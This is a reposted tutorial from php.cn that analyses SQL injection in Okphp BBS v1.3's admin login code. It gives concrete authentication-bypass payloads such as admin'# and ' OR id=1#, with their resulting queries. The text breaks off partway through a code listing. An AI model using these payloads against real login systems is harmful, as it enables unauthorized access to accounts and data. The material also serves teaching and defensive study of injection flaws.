Home > 类库下载 > PHP类库 > Attack method: Talk about php+mysql injection statement structure

Attack method: Talk about php+mysql injection statement structure

高洛峰
Release: 2016-10-14 10:16:18
Original
1346 people have browsed it

1. Foreword:

Version information: Okphp BBS v1.3 Open Source Edition

Download address: http://www.cncode.com/SoftView.asp?SoftID=1800

Due to the limitations of PHP and MYSQL, PHP +MYSQL injection is more difficult than asp, especially the construction of statements during injection. This article mainly uses a simple analysis of some files of Okphp BBS v1.3 to talk about the construction method of php+mysql injection statements. I hope this article It will be of some help to you.

Statement: All the "vulnerabilities" mentioned in the article have not been tested and may not exist at all. In fact, it does not matter whether there are loopholes or not. What is important is the analysis ideas and statement structure.

  2. "Vulnerability" analysis:

1. Admin/login.php injection leads to authentication bypass vulnerability:

Code:

$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);

 $password = md5($password);

 $q = "select id,group_id from $user_table where username='$username' and password='$password'";

 $res = sql_query($q, $conn);

 $row = sql_fetch_row($res);

 $q = "select id,group_id from $user_table where username='$username' and password='$password'" in

 $username and $ The password is not filtered and can be easily bypassed.

  Methods for modifying statements like select * from $user_table where username='$username' and password='$password' are:

  Construction 1 (using logical operations): $username=' OR 'a'=' a $password=' OR 'a'='a

Equivalent to sql statement:

Select * from $user_table where username='' OR 'a'='a' and password='' OR 'a'=' a'

 Construction 2 (use the comment statement # in mysql, /* to comment out $password): $username=admin'#(or admin'/*)

 That is:

 select * from $user_table where username ='admin'#' and password='$password'"

  Equivalent to:

  select * from $user_table where username='admin'

  The $password in the $q statement in admin/login.php is in the query md5 encryption was performed before, so it cannot be bypassed by the statement in construct 1. Here we use construct 2:

 select id, group_id from $user_table where username='admin'#' and password='$password'"

Equivalent to:

  select id, group_id from $user_table where username='admin'

  This is true as long as there is a user named admin. If you don't know the user name, you only know the corresponding id,

 We can construct it like this: $username=' OR id=1#

  Equivalent to:

  select id,group_id from $user_table where username='' OR id=1# and password='$password' (the ones after # are commented out)

Let’s look at the code below:

 if ($row[0]) {
  // If not admin or super moderator
  if ($username != "admin" && !eregi("(^|&)3($|&)",$row[1])) {
  $login = 0;
  }
  else {
  $login = 1;
  }
  }
  // Fail to login---------------
  if (!$login) {
  write_log("Moderator login","0","password wrong");
Copy after login

 echo " Please indicate the source for reprinting: Attack method: Talk about php+mysql injection statement structure


source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Recommendations
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template